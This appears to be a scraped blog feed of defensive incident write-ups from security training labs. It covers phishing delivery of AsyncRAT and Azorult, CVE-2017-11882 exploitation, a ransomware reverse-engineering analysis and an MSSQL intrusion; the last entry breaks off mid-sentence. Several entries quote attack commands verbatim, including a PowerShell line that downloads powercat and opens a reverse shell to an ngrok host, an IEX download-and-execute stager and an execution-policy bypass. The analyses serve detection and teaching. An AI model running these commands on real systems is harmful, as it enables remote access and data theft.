Sender domain coffeeshooop[.]com and SMTP IP 103.80.134.63 were blocked at the email gateway. Transport rules were created to block future delivery of emails matching extracted IOCs.\nAre endpoints still beaconing? # The C2 IP 37.120.233.226 is hosted on M247 infrastructure (AS9009, Manchester UK) and was flagged as malicious by 12/94 vendors on VirusTotal.\nThe IP was blocked at the firewall and DNS sinkhole. Felix\u0026rsquo;s endpoint 172.16.20.15 was isolated immediately to terminate the active AsyncRAT session.\nPost-exploitation commands confirmed on the endpoint between 13:01:00 and 13:01:30 via cmd.exe: systeminfo, hostname, wmic logicaldisk, net user, tasklist /svc, ipconfig /all, route print. Process Coffee.exe confirmed active in the process list at time of containment.\nEndpoint contained. Case escalated to L2 for full forensic investigation, memory acquisition, and credential reset across all systems accessible from 172.16.20.151.\nIOCs # Domains\n- coffeeshooop[.]com - typosquatted sender domain\nIPs\n- 103.80.134[.]63 - SMTP source address\n- 37.120.233[.]226 - AsyncRAT C2 (M247, AS9009, Manchester UK)\nURLs\n- hxxps://files-ld.s3.us-east-2.amazonaws[.]com/59cbd215-76ea-434d-93ca-4d6aec3bac98-free-coffee.zip - malware distribution\nFiles\n- Coffee.exe - AsyncRAT payload (SHA256: cd903ad2211cf7d166646d75e57fb866000f4a3b870b5ec759929be2fd81d334)\n- free-coffee.zip - password-protected dropper archive\nEmail\n- free@coffeeshooop[.]com - phishing sender\n- Felix@letsdefend.io - targeted recipient\nPorts\n- 3451/TCP - AsyncRAT C2 communication\nMITRE ATT\u0026amp;CK #\nTactic | Technique | ID\nInitial Access | Phishing | T1566\nInitial Access | Spearphishing Link | T1566.002\nExecution | User Execution: Malicious File | T1204.002\nDefense Evasion | Obfuscated Files or Information | T1027\nDefense Evasion | Masquerading | T1036\nDefense Evasion | Time Based Evasion | T1497.003\nDiscovery | System Information Discovery | T1082\nDiscovery | Account Discovery | T1087\nDiscovery | Network Configuration Discovery | T1016\nDiscovery | Process Discovery | T1057\nCredential Access | Input Capture: Keylogging | T1056.001\nCommand and Control | Application Layer Protocol: Web Protocols | T1071.001\nCommand and Control | Non-Standard Port | T1571\n","date":"March 17, 2026","externalUrl":null,"permalink":"/blue_team/ld-phishing-alert/","section":"","summary":"A phishing email with a password-protected ZIP delivered AsyncRAT via a SILENTBUILDER dropper. The victim executed the payload, establishing an active C2 channel and triggering full host reconnaissance before containment.","title":"LD-Deceptive Mail Detected","type":"blue_team"},{"content":"","date":"March 16, 2026","externalUrl":null,"permalink":"/tags/cve-2017-11882/","section":"Tags","summary":"","title":"CVE-2017-11882","type":"tags"},{"content":"","date":"March 16, 2026","externalUrl":null,"permalink":"/tags/dns-tunneling/","section":"Tags","summary":"","title":"DNS Tunneling","type":"tags"},{"content":"","date":"March 16, 2026","externalUrl":null,"permalink":"/tags/juicypotato/","section":"Tags","summary":"","title":"JuicyPotato","type":"tags"},{"content":" TL;DR # A phishing email impersonating an invoice notification was delivered to richard@letsdefend.io from the spoofed address accounting@cmail.carleton.ca. The password-protected attachment contained a malicious Office file exploiting CVE-2017-11882 (Microsoft Equation Editor RCE). Upon opening, EQNEDT32.EXE was spawned by excel.exe and performed an outbound GET request to http://andaluciabeach.net/image/network.exe, successfully downloading a payload (network.exe) from 5.135.143.133. The attacker subsequently dropped and executed JuicyPotato.exe from C:/User/Public/ under NT Authority/System, achieving full local privilege escalation on the compromised host. 
The alert is classified as a True Positive with confirmed endpoint compromise.\nAlert Overview #\nField | Value\nEventID | 45\nEvent Time | Jan 31, 2021, 03:48 PM\nRule | SOC114 - Malicious Attachment Detected - Phishing Alert\nLevel | Security Analyst\nSMTP Address | 49.234.43.39\nSource Address | accounting@cmail.carleton.ca\nDestination Address | richard@letsdefend.io\nE-mail Subject | Invoice\nDevice Action | Allowed\nInvestigation # An inbound email arrived at richard@letsdefend.io from accounting@cmail.carleton.ca with the subject \u0026ldquo;Invoice\u0026rdquo; and a generic body — \u0026ldquo;Dear customer, Your invoice for the shopping you have done is attached. Regards.\u0026rdquo; The email originated from SMTP address 49.234.43.39 and was delivered without being blocked by the mail gateway.\nThe email carried a password-protected attachment (password: infected) with the file hash (MD5) c9ad9506bcccfaa987ff9fc11b91698d. The extracted file was identified as:\nFilename 44e65a641fb970031c5efed324676b5018803e0a768608d3e186152102615795.xlsx\nMD5 c9ad9506bcccfaa987ff9fc11b91698d\nSHA-1 e788183a2a021f74a21f609e514bb63c4ef2fe49\nSHA-256 44e65a641fb970031c5efed324676b5018803e0a768608d3e186152102615795\nFile type MS PowerPoint Presentation (OLE2 Encrypted Structured Storage)\nFile size 2.12 MB (2218496 bytes)\nMagika PPT\nTrID Microsoft Encrypted Structured Storage Object (96.9%), Generic OLE2 / Multistream Compound (3%)\nTLSH T145A5334026D14F16D93F52B080DF983653AFCD38FE941E9962063F69B47AA7A33C624D\nVirusTotal analysis returned 36/62 detections. The file was tagged with cve-2017-11882, exploit, and executes-dropped-file. Multiple vendors classified it as a trojan downloader exploiting the Microsoft Office Equation Editor vulnerability CVE-2017-11882.\nVirusTotal behavior analysis revealed two contacted URLs associated with the sample, both resolving to andaluciabeach.net, with http://andaluciabeach.net/image/network.exe flagged by 12/95 vendors.\nThe endpoint was contained. 
Review of Richard\u0026rsquo;s proxy logs confirmed that the host 172.16.17.45 successfully performed a GET request to http://andaluciabeach.net/image/network.exe (resolving to 5.135.143.133) at 16:15 on Jan 31, 2021. The request was initiated by EQNEDT32.EXE — the Microsoft Equation Editor process — spawned under excel.exe, confirming successful exploitation of CVE-2017-11882. The device action was recorded as Allowed, meaning the payload was downloaded.\nFollowing the payload download, process logs revealed that JuicyPotato.EXE was executed at 16:20 from C:/User/Public/JuicyPotato.exe under the NT Authority/System context, indicating successful local privilege escalation after the initial compromise.\nMD5 808502752ca0492aca995e9b620d507b\nPath C:/User/Public/JuicyPotato.exe\nSize 340 KB\nUser NT Authority/System\nTime 2021-01-31 16:20\nIOCs #\nType | Value\nMD5 | c9ad9506bcccfaa987ff9fc11b91698d\nSHA-256 | 44e65a641fb970031c5efed324676b5018803e0a768608d3e186152102615795\nSMTP IP | 49.234.43.39\nSender | accounting@cmail.carleton.ca\nPayload URL | http://andaluciabeach.net/image/network.exe\nC2 IP | 5.135.143.133\nDomain | andaluciabeach.net\nMD5 (tool) | 808502752ca0492aca995e9b620d507b (JuicyPotato.exe)\nHost IP | 172.16.17.45\nMITRE ATT\u0026amp;CK #\nTactic | Technique | ID\nInitial Access | Phishing: Spearphishing Attachment | T1566.001\nExecution | Exploitation for Client Execution (CVE-2017-11882) | T1203\nExecution | User Execution: Malicious File | T1204.002\nCommand and Control | Ingress Tool Transfer | T1105\nPrivilege Escalation | Exploitation for Privilege Escalation (JuicyPotato) | T1068\nDefense Evasion | Obfuscated Files or Information (password-protected archive) | T1027\n","date":"March 16, 2026","externalUrl":null,"permalink":"/blue_team/ld-malicious-attachment-detected---phishing-alert/","section":"","summary":"Investigation of a phishing email delivering a malicious Excel attachment exploiting CVE-2017-11882, leading to payload download and privilege escalation via JuicyPotato","title":"LD-Malicious 
Attachment Detected","type":"blue_team"},{"content":"","date":"March 16, 2026","externalUrl":null,"permalink":"/tags/powercat/","section":"Tags","summary":"","title":"Powercat","type":"tags"},{"content":"","date":"March 16, 2026","externalUrl":null,"permalink":"/tags/powerview/","section":"Tags","summary":"","title":"PowerView","type":"tags"},{"content":" TL;DR # TryHatMe CEO Michael Ascot was targeted in a spear-phishing attack via a fraudulent email from john@hatmakereurope.xyz. The attachment ImportantInvoice-February.zip contained a malicious LNK file that, upon execution, downloaded and ran powercat.ps1 in memory and established a reverse shell to an attacker-controlled ngrok endpoint. With interactive access to the host, the attacker enumerated the Active Directory environment using PowerView, mounted a financial records network share, staged sensitive files locally, and exfiltrated them via DNS tunneling to avoid detection. The incident is a textbook example of a living-off-the-land attack chain combining social engineering, in-memory execution, legitimate tooling abuse, and covert exfiltration over DNS.\nInvestigation # Initial Access # At 07:36:53, CEO Michael Ascot (michael.ascot@tryhatme.com, host win-3450) received an inbound email from john@hatmakereurope.xyz. The sender domain was registered to impersonate a legitimate hat industry business and had no prior relationship with TryHatMe. The email subject read \u0026ldquo;FINAL NOTICE: Overdue Payment - Account Suspension Imminent\u0026rdquo; and used urgency language threatening legal action within 24 hours — a classic fear-based social engineering lure targeting a C-level executive.\nThe attachment was ImportantInvoice-February.zip (SHA-256: 145BB70ABD0CC625F4A7ADD8CFB08982C39C4573470C8B87DB41D755BD2F9EA0). The archive contained a Windows shortcut file invioce.pdf.lnk masquerading as a PDF document. 
The LNK file embedded the following malicious command:\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\u0026#34; -c \u0026#34;IEX(New-Object System.Net.WebClient).DownloadString(\u0026#39;https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1\u0026#39;); powercat -c 2.tcp.ngrok.io -p 19282 -e powershell\nUpon execution, PowerShell downloaded and ran powercat.ps1 directly in memory — a PowerShell implementation of Netcat — and established a reverse shell back to the attacker\u0026rsquo;s ngrok tunnel at 2.tcp.ngrok.io:19282. Because the payload executed entirely in memory, no binary was written to disk at this stage, reducing the likelihood of AV detection.\nActive Directory Enumeration # At 07:57:14, a temporary script __PSScriptPolicyTest_hnpvwg1v.3mr.ps1 was created on the compromised host, indicating the attacker was probing PowerShell execution policy restrictions. At 08:32:23, PowerView.ps1 was downloaded and executed. PowerView is a well-known PowerShell toolkit for Active Directory reconnaissance, used to enumerate domain users, groups, and trust relationships. SIEM logs confirmed domain enumeration activity originating from win-3450 during this window.\nNetwork Share Mounting and File Staging # At 08:01:05, the attacker created a staging directory at C:\\Users\\michael.ascot\\Downloads\\exfiltration. Using net.exe, the network share \\\\FILESRV-01\\SSF-FinancialRecords was mounted as local drive Z:. The attacker then used Robocopy.exe to copy the contents of the share into the local staging directory. The exfiltrated files included InvestorPresentation2023.pptx and ClientPortfolioSummary.xlsx.\nExfiltration # At 08:01:34, the network share connection was disconnected via net.exe use Z: /delete to remove evidence of the mount. At 08:35:34, the staged files were compressed into exfilt8me.zip. 
The archive was then base64-encoded and exfiltrated via DNS tunneling — the encoded data was split into 30-character chunks and transmitted as subdomains in a series of nslookup.exe queries launched from PowerShell, effectively bypassing network-layer data loss prevention controls that do not inspect DNS traffic.\nIOCs # Email\n- Sender domain: hatmakereurope.xyz\n- Attachment: ImportantInvoice-February.zip — 145BB70ABD0CC625F4A7ADD8CFB08982C39C4573470C8B87DB41D755BD2F9EA0\nFiles\n- invoice.pdf.lnk — LNK phishing stager\n- exfilt8me.zip — exfiltration archive — 50E5BF8361DF2442546F21E08B1561273F4CCC610258F622AC1A4B8EBF0A0386\nNetwork\n- raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1 — payload delivery\n- 2.tcp.ngrok.io:19282 — C2 reverse shell\nHost\n- Compromised host: win-3450 (michael.ascot@tryhatme.com)\n- Targeted share: \\\\FILESRV-01\\SSF-FinancialRecords\nMITRE ATT\u0026amp;CK #\nTactic | Technique | ID\nInitial Access | Phishing: Spearphishing Attachment | T1566.001\nExecution | User Execution: Malicious File (LNK) | T1204.002\nExecution | Command and Scripting Interpreter: PowerShell | T1059.001\nExecution | System Binary Proxy Execution: Mshta / PowerShell in-memory | T1218\nCommand and Control | Application Layer Protocol: Web Protocols (ngrok) | T1071.001\nDiscovery | Account Discovery: Domain Account | T1087.002\nDiscovery | Domain Trust Discovery (PowerView) | T1482\nCollection | Data from Network Shared Drive | T1039\nExfiltration | Exfiltration Over Alternative Protocol: DNS | T1048.003\nDefense Evasion | Obfuscated Files or Information (base64 encoding) | T1027\nDefense Evasion | Indicator Removal: Network Share Connection Removal | T1070\n","date":"March 16, 2026","externalUrl":null,"permalink":"/blue_team/thm-phishing-unfolding/","section":"","summary":"","title":"THM-Phishing Unfolding","type":"blue_team"},{"content":"","date":"March 16, 2026","externalUrl":null,"permalink":"/tags/xlsx/","section":"Tags","summary":"","title":"Xlsx","type":"tags"},{"content":"","date":"March 15, 
2026","externalUrl":null,"permalink":"/tags/elf64/","section":"Tags","summary":"","title":"ELF64","type":"tags"},{"content":" Difficulty: Hard OS: Linux Date: 2026-03-15 TL;DR # A Linux ransomware ELF binary (ubuntu-client) was deployed on a development server by an insider threat. The malware XOR-decrypts its strings at runtime using a command-line passphrase, beacons to a DigitalOcean-hosted C2 to retrieve an AES-256-CBC key and IV, recursively exfiltrates and encrypts files under /share with a .24bes extension, then installs a systemd persistence service before deleting itself.\nMemory Analysis # Bash History # Memory analysis of the VMware snapshot (ubuntu-client-Snapshot2.vmem) using Volatility 3 revealed two distinct bash sessions. The insider (PID 636) executed the malicious binary multiple times with the argument xGonnaGiveIt2Ya before deleting it to cover their tracks. A remote attacker (PID 22683) subsequently connected over SSH, re-downloaded the binary from 10.10.0.70 and executed it again. The history also shows modifications to /etc/ssh/sshd_config.\nPS C:\\Users\\s\\Desktop\\lockpick3 \u0026gt; vol -f .\\ubuntu-client-Snapshot2.vmem linux.bash.Bash\nVolatility 3 Framework 2.27.0\nProgress: 100.00 Stacking attempts finished\nPID Process CommandTime Command\n...[snip]... 
636 bash 2024-06-03 10:49:32.000000 UTC nano /etc/ssh/sshd_config\n636 bash 2024-06-03 10:50:30.000000 UTC ip a\n636 bash 2024-06-03 10:51:41.000000 UTC nano /etc/ssh/sshd_config\n636 bash 2024-06-03 10:53:22.000000 UTC systemctl restart shh\n636 bash 2024-06-03 10:53:29.000000 UTC sudo\n636 bash 2024-06-03 10:53:29.000000 UTC systemctl restart ssh\n636 bash 2024-06-03 11:21:30.000000 UTC ls\n636 bash 2024-06-03 15:31:03.000000 UTC sudo apt-get install apache2\n636 bash 2024-06-03 15:32:44.000000 UTC ./ubuntu-client xGonnaGiveIt2Ya\n636 bash 2024-06-03 15:36:00.000000 UTC ./ubuntu-client xGonnaGiveIt2Ya\n636 bash 2024-06-03 15:40:24.000000 UTC ./ubuntu-client xGonnaGiveIt2Ya\n636 bash 2024-06-03 15:50:57.000000 UTC rm ubuntu-client\n...[snip]...\n22683 bash 2024-06-03 15:51:25.000000 UTC mdkir /share\n22683 bash 2024-06-03 15:51:25.000000 UTC wget http://10.10.0.70:8123/ubuntu-client\n22683 bash 2024-06-03 15:51:25.000000 UTC wget http://10.10.0.70:8000/ubuntu-client\n22683 bash 2024-06-03 15:51:38.000000 UTC ./ubuntu-client xGonnaGiveIt2Ya\n22683 bash 2024-06-03 15:54:24.000000 UTC sudo apt-get install libcjson-dev\n22683 bash 2024-06-03 15:54:31.000000 UTC ./ubuntu-client xGonnaGiveIt2Ya\nInitial Analysis #\n.\\ubuntu-client: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked,\ninterpreter /lib64/ld-linux-x86-64.so.2,\nBuildID[sha1]=595b1b2a3a1451774884ddc5d265e25a44e21574, for GNU/Linux 3.2.0, stripped\n┌─────────────┬────────────────────────────────────────────────────────────────────────────────────┐\n│ md5 │ a2444b61b65be96fc2e65924dee8febd │\n│ sha1 │ 071de351a8c1d4df1437c8d68e217a19c719c7af │\n│ sha256 │ fc519667f03cb94ab7675c0427da42a38abb8675dda4b53cea814499040c0947 │\n│ os │ linux │\n│ format │ elf │\n│ arch │ amd64 │\n│ path │ C:/Users/s/Desktop/lockpick3/ubuntu-client │\n└─────────────┴────────────────────────────────────────────────────────────────────────────────────┘\nStrings # Static analysis of the binary 
revealed its core capabilities before any reversing. The malware likely uses AES-256-CBC to encrypt files with extensions .txt .pdf .sql .db .docx .xlsx .pptx .zip .tar .tar.gz, renaming each to .24bes. Communication with the C2 server is handled via libcurl over HTTPS using two endpoints: /connect and /upload/.\nEVP_EncryptUpdate\nEVP_EncryptInit\nEVP_aes_256_cbc\nEVP_CIPHER_CTX_new\nEVP_EncryptFinal\nEVP_CIPHER_CTX_free\n...[snip]...\nContent-Type: application/json\n/connect\nkey\nclient_id\n{\u0026#34;passphrase\u0026#34;: \u0026#34;%s\u0026#34;, \u0026#34;hostname\u0026#34;: \u0026#34;%s\u0026#34;}\n.txt\n.pdf\n.sql\n.db\n.docx\n.xlsx\n.pptx\n.zip\n.tar\n.tar.gz\nX-Filename: %s\n/upload/\n%s.24bes\nReversing with IDA # Strings Encryption # All sensitive strings in the binary are XOR-encrypted at rest and decrypted at runtime by mw_xor_decryption() using the passphrase supplied as a command-line argument. The routine iterates over each byte of the encrypted buffer and XORs it against the key with wrap-around (i % key_length).\nThe XOR key used for all string decryption is xGonnaGiveIt2Ya — the passphrase passed as argv[1] at execution time. In hex: 78476f6e6e61476976654974325961. For convenience, I used the IDA plugin hrt to decrypt the data with its Xor with string algorithm (key 78476f6e6e61476976654974325961):\nThe full list of strings decrypted at startup:\nAddress | Decrypted Value | Purpose\nunk_6020 | https://plankton-app-3qigq.ondigitalocean.app/ | C2 base URL\naShare | /share/ | Target directory\naSebh24 | sebh24 | Passphrase sent to C2\naUsrBinUbuntuRu | /usr/bin/ubuntu-run | Persistence binary path\naEtcSystemdSyst | /etc/systemd/system/ubuntu_running.service | Systemd unit path\naUnitDescriptio | [Unit]\\nDescription=Ubuntu Running\\n... | Systemd unit content\naSystemctlDaemo | systemctl daemon-reload \u0026amp;\u0026amp; systemctl enable ubuntu_running.service \u0026amp;\u0026amp; systemctl start ubuntu_running.service | Persistence activation\nAfter all strings are decrypted, main executes three functions:\nC2 Communication — Key Retrieval # The function mw_request_and_key_retrieving performs the initial C2 beacon. It builds a JSON payload containing the hardcoded passphrase sebh24 and the victim\u0026rsquo;s hostname, then POSTs it to /connect.\nValue | CURLOPT Constant | Description\n10002 | CURLOPT_URL | Request URL\n10015 | CURLOPT_POSTFIELDS | POST request body (JSON payload)\n20011 | CURLOPT_WRITEFUNCTION | Callback function for writing the response\n10001 | CURLOPT_WRITEDATA | Buffer where the response is written\n10023 | CURLOPT_HTTPHEADER | HTTP headers (Content-Type: application/json)\nThe payload is constructed by mw_passphrase_and_hostname:\n{\u0026#34;passphrase\u0026#34;: \u0026#34;sebh24\u0026#34;, \u0026#34;hostname\u0026#34;: \u0026#34;\u0026lt;victim_hostname\u0026gt;\u0026#34;}\nOn success, the C2 responds with a JSON object containing three fields parsed via cJSON:\nField | Purpose\nkey | AES-256-CBC encryption key\niv | AES initialisation vector\nclient_id | Unique victim tracking identifier\nEncryption only proceeds if both key and iv are successfully received. 
If the C2 is unreachable, the malware exits without encrypting any files.\nFile Exfiltration \u0026amp; Encryption # The malware implements a recursive directory traversal starting at /share/, targeting files with the following extensions:\ns2[0] = \u0026#34;.txt\u0026#34;; s2[1] = \u0026#34;.pdf\u0026#34;; s2[2] = \u0026#34;.sql\u0026#34;;\ns2[3] = \u0026#34;.db\u0026#34;; s2[4] = \u0026#34;.docx\u0026#34;; s2[5] = \u0026#34;.xlsx\u0026#34;;\ns2[6] = \u0026#34;.pptx\u0026#34;; s2[7] = \u0026#34;.zip\u0026#34;; s2[8] = \u0026#34;.tar\u0026#34;;\ns2[9] = \u0026#34;.tar.gz\u0026#34;;\nEach matching file is exfiltrated to the C2 via an HTTP PUT request before any encryption occurs:\nPUT https://plankton-app-3qigq.ondigitalocean.app/upload/\u0026lt;client_id\u0026gt;\nX-Filename: \u0026lt;filename\u0026gt;\nThen the file is encrypted using AES-256-CBC with the key and IV retrieved from C2. The encrypted output is written to \u0026lt;filename\u0026gt;.24bes, the original file is zero-wiped with memset, and then deleted with remove() — preventing recovery via file carving or undelete tools.\nPersistence # After encryption completes, the malware installs itself as a systemd service to survive reboots. 
It copies the binary to /usr/bin/ubuntu-run, writes the following unit file to /etc/systemd/system/ubuntu_running.service, then runs systemctl daemon-reload \u0026amp;\u0026amp; systemctl enable ubuntu_running.service \u0026amp;\u0026amp; systemctl start ubuntu_running.service.\n[Unit]\nDescription=Ubuntu Running\nAfter=network.target\n\n[Service]\nExecStart=/usr/bin/ubuntu-run xGonnaGiveIt2Ya\nRestart=always\nUser=root\n\n[Install]\nWantedBy=multi-user.target\nNote that ExecStart passes xGonnaGiveIt2Ya as the argument — meaning the XOR decryption key is baked into the service definition, allowing the malware to restart and re-encrypt after a reboot or recovery attempt.\nIOCs #\nType | Value\nMD5 | a2444b61b65be96fc2e65924dee8febd\nSHA1 | 071de351a8c1d4df1437c8d68e217a19c719c7af\nSHA256 | fc519667f03cb94ab7675c0427da42a38abb8675dda4b53cea814499040c0947\nC2 URL | https://plankton-app-3qigq.ondigitalocean.app/\nC2 Endpoint | /connect — key retrieval\nC2 Endpoint | /upload/\u0026lt;client_id\u0026gt; — file exfiltration\nAttacker IP | 10.10.0.70\nRansomware extension | .24bes\nPersistence binary | /usr/bin/ubuntu-run\nPersistence service | /etc/systemd/system/ubuntu_running.service\nXOR key | xGonnaGiveIt2Ya\nC2 passphrase | sebh24\nMITRE ATT\u0026amp;CK #\nTechnique | ID | Description\nIngress Tool Transfer | T1105 | Binary downloaded via wget from 10.10.0.70\nObfuscated Files or Information | T1027 | XOR-encrypted strings keyed on CLI passphrase\nApplication Layer Protocol: HTTPS | T1071.001 | C2 communication to DigitalOcean over HTTPS\nExfiltration Over C2 Channel | T1041 | Files PUT to /upload/\u0026lt;client_id\u0026gt; before encryption\nData Encrypted for Impact | T1486 | AES-256-CBC encryption → .24bes extension\nIndicator Removal: File Deletion | T1070.004 | Originals zeroed and removed after encryption\nCreate or Modify System Process: Systemd Service | T1543.002 | ubuntu_running.service for persistence\nModify SSH Config | T1098 | /etc/ssh/sshd_config modified early in session\nAttack Flow #\nDelivery: Attacker 10.10.0.70 → Modify /etc/ssh/sshd_config → ./ubuntu-client xGonnaGiveIt2Ya\nString Decryption: XOR decrypt strings (key = xGonnaGiveIt2Ya) → C2 URL, /share/, /usr/bin/ubuntu-run, ubuntu_running.service\nC2 Registration: POST /connect (passphrase + hostname) → Receive AES key, IV + client_id\nEncryption and Exfiltration: Recursive traversal of /share/ → PUT /upload/client_id (X-Filename header) → AES-256-CBC encrypt → filename.24bes → Zero + remove original\nPersistence: Copy to /usr/bin/ubuntu-run → Write ubuntu_running.service → systemctl daemon-reload, enable + start → Survives reboot\n","date":"March 15, 2026","externalUrl":null,"permalink":"/investigations/htb-lockpick3.0/","section":"","summary":"An ELF64 ransomware binary uses XOR string obfuscation keyed on a CLI passphrase, contacts a DigitalOcean C2 to register and retrieve an AES-256-CBC key and IV, recursively encrypts target files in 
/share/ renaming them to .24bes, exfiltrates the originals via HTTP PUT, zeroes and removes the source files, and installs a systemd service for persistence.","title":"HTB-Lockpick3.0","type":"investigations"},{"content":"","date":"March 15, 2026","externalUrl":null,"permalink":"/tags/ida/","section":"Tags","summary":"","title":"IDA","type":"tags"},{"content":" TL;DR # The alert is a True Positive. The user LetsDefend on host Tony downloaded payload_1.ps1 (Azorult/Boxter trojan) from an attacker-controlled S3 URL via Chrome, bypassed the PowerShell execution policy, and executed the script. The script fetched and ran a second-stage payload (sd2.ps1) in memory from kionagranada.com (161.22.46.148). A second C2 server at 91.236.116.163 was associated with the broader campaign infrastructure. The attack involved two-stage C2, fileless execution, and sandbox evasion.\nAlert Overview #\n- EventID: 238\n- Event Time: Mar 14, 2024, 05:23 PM\n- Rule: SOC153 — Suspicious Powershell Script Executed\n- Level: Security Analyst\n- Hostname: Tony\n- IP Address: 172.16.17.206\n- File Name: payload_1.ps1\n- File Path: C:\\Users\\LetsDefend\\Downloads\\payload_1.ps1\n- File Hash: db8be06ba6d2d3595dd0c86654a48cfc4c0c5408fdd3f4e1eaf342ac7a2479d0\n- Trigger Reason: Suspicious Powershell Script Executed\n- AV/EDR Action: Detected\nThe alert fired at 2024-03-14 17:23 on host Tony with IP 172.16.17.206. The triggered rule was SOC153 — Suspicious PowerShell Script Executed, classified as Malware / Medium severity. 
The file involved was payload_1.ps1 located at:\nC:\\Users\\LetsDefend\\Downloads\\payload_1.ps1\nSHA256: db8be06ba6d2d3595dd0c86654a48cfc4c0c5408fdd3f4e1eaf342ac7a2479d0\nThe AV/EDR reported the file as Detected but did not block execution.\nInitial Download # Proxy logs confirmed that user LetsDefend on the same host downloaded the file via Chrome at 2024-03-14 17:22:25 from an Amazon S3 bucket:\nSource IP: 172.16.17.206:22456\nDestination IP: 3.5.130.147:443\nURL: https://files-ld.s3.us-east-2.amazonaws.com/payload_1.ps1\nProcess: chrome.exe\nDevice Action: Allowed\nApproximately 60 seconds later, Sysmon Event ID 1 (Process Create) recorded PowerShell launching the script with an explicit execution policy bypass (scoped to the process with -Scope Process, so no persistent policy change is left on the host):\nEventID: 1\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\nCommandLine: \u0026#34;powershell.exe\u0026#34; \u0026#34;-Command\u0026#34; \u0026#34;if((Get-ExecutionPolicy) -ne \u0026#39;AllSigned\u0026#39;) { Set-ExecutionPolicy -Scope Process Bypass }; \u0026amp; \u0026#39;C:\\Users\\LetsDefend\\Downloads\\payload_1.ps1\\payload_1.ps1\u0026#39;\u0026#34;\nHash: db8be06ba6d2d3595dd0c86654a48cfc4c0c5408fdd3f4e1eaf342ac7a2479d0\nPID: 4315\npayload_1.ps1 # Submitting the hash to VirusTotal returned 33/62 vendor detections. The file was identified internally as agent3.ps1. Key findings:\nThreat label: trojan.powershell/boxter\nThreat categories: trojan, downloader\nFamily labels: powershell, boxter, azorult\nBehavioral tags: detect-debug-environment, exe-pattern, url-pattern, long-sleeps, checks-network-adapters\nThe presence of the detect-debug-environment and long-sleeps tags indicates sandbox evasion logic. 
The azorult family label identifies this as a credential-stealing infostealer with downloader capabilities.\nC2 Stage 1 # PowerShell Event ID 4104 (Script Block Logging, written to the Microsoft-Windows-PowerShell/Operational log rather than by Sysmon) captured the payload\u0026rsquo;s in-memory command at 2024-03-14 17:23:\nEventID: 4104\nScript Block Text: \u0026#34;C:\\Windows\\system32\\cmd.exe\u0026#34; /c \u0026#34;powershell -command IEX(IWR -UseBasicParsing \u0026#39;https://kionagranada.com/upload/sd2.ps1\u0026#39;)\u0026#34;\nUsername: LetsDefend\nProcessId: 6968\npayload_1.ps1 used Invoke-WebRequest (IWR) to download sd2.ps1 from kionagranada.com and immediately executed it in memory via Invoke-Expression (IEX), a fileless technique that leaves no copy of the second stage on disk.\nA Sysmon Event ID 22 (DNS Query) confirmed the resolution:\nEventID: 22\nQueryName: kionagranada.com\nQueryResult: 161.22.46.148\nProcess: powershell.exe\nUtcTime: 2024-03-14 17:23:46\n161.22.46.148 is the C2 Stage 1 server hosting the second-stage script. VirusTotal relations for this IP showed a communicating file sd4.ps1 (13/62 detections) and numerous ELF and executable files associated with the same infrastructure.\nC2 Stage 2 # VirusTotal relations for the second C2 IP 91.236.116.163 revealed a broad threat infrastructure including communicating files with names such as Chase_Bank_Statement_March.zip, Chase_Bank_Statement_March.lnk, WinFormGregorCatch.exe (56/71), and payload_1.js (34/62), all consistent with a large-scale phishing and infostealer operation using banking lure themes.\nThe file 2024-04-03-https___kionaonline.com_modules_bonslick_agent3.ps1.txt (29/63) corroborates the agent3.ps1 internal name identified in the VirusTotal sample, linking both C2 IPs to the same campaign infrastructure.\nIOCs # Files\n- C:\\Users\\LetsDefend\\Downloads\\payload_1.ps1 — db8be06ba6d2d3595dd0c86654a48cfc4c0c5408fdd3f4e1eaf342ac7a2479d0\nNetwork\n- https://files-ld.s3.us-east-2.amazonaws.com/payload_1.ps1 — initial download\n- kionagranada.com / 161.22.46.148 — C2 Stage 
1\n- https://kionagranada.com/upload/sd2.ps1 — second-stage payload\n- 91.236.116.163 — C2 Stage 2\nMITRE ATT\u0026amp;CK #\n- Phishing / Drive-by Download (T1566 / T1189): payload_1.ps1 downloaded via Chrome\n- PowerShell (T1059.001): script executed with Bypass policy\n- Obfuscated Files or Information (T1027): fileless IEX(IWR) in-memory execution\n- Ingress Tool Transfer (T1105): sd2.ps1 fetched from C2\n- Command and Scripting Interpreter (T1059): cmd.exe spawned by PowerShell\n- Application Layer Protocol: HTTPS (T1071.001): C2 communication over HTTPS\n- Virtualization/Sandbox Evasion (T1497): detect-debug-environment, long-sleeps\n","date":"March 14, 2026","externalUrl":null,"permalink":"/blue_team/ld-soc153---suspicious-powershell-script-executed/","section":"","summary":"The user on host Tony downloaded and executed a malicious PowerShell script (payload_1.ps1 / agent3.ps1) classified as trojan.powershell/boxter (Azorult family). The script bypassed execution policy, then fetched and invoked a second-stage payload from kionagranada.com (161.22.46.148), establishing a two-stage C2 chain with a final pivot to 91.236.116.163.","title":"LD-Suspicious PowerShell Script Executed","type":"blue_team"},{"content":"","date":"March 14, 2026","externalUrl":null,"permalink":"/tags/sandbox-evasion/","section":"Tags","summary":"","title":"Sandbox Evasion","type":"tags"},{"content":" Difficulty: Medium OS: Windows Date: 2026-03-10 TL;DR # The attacker at 87.96.21.84 performed a TCP port scan, identified an exposed MSSQL instance, and authenticated as sa with a weak password. After enabling xp_cmdshell, a base64-encoded PE was dropped to %TEMP% and decoded via a VBScript. 
A reverse shell provided full access, after which the attacker downloaded a PowerShell toolkit: checking.ps1 to disable Windows Defender and AV services, ichigo-lite.ps1 to dump NTLM hashes via Invoke-PowerDump and perform lateral movement via Invoke-SMBExec, and javaw.exe, the BlueSky ransomware payload staged to C:\\ProgramData\\.\nPackets Overview # Reconnaissance # The attacker at 87.96.21.84 performed a TCP port scan against the victim, discovering five open ports:\n445 SMB\n139 NetBIOS\n135 Microsoft RPC\n5357 WS-Discovery\n1433 Microsoft SQL Server\nSQL Server Exploitation # The attacker enumerated the MSSQL instance and authenticated using the system administrator account:\nUsername: sa\nPassword: cyb3rd3f3nd3r$\nAfter gaining access, xp_cmdshell was enabled by changing its configuration value from 0 to 1 (via sp_configure), allowing direct OS command execution from within SQL Server.\nA base64-encoded PE (TVqQ... is the base64 form of the MZ header) was transferred through the SQL connection and saved to %TEMP%\\SBjzH.b64.\nA VBScript decoder (Gjmwb.vbs) was then 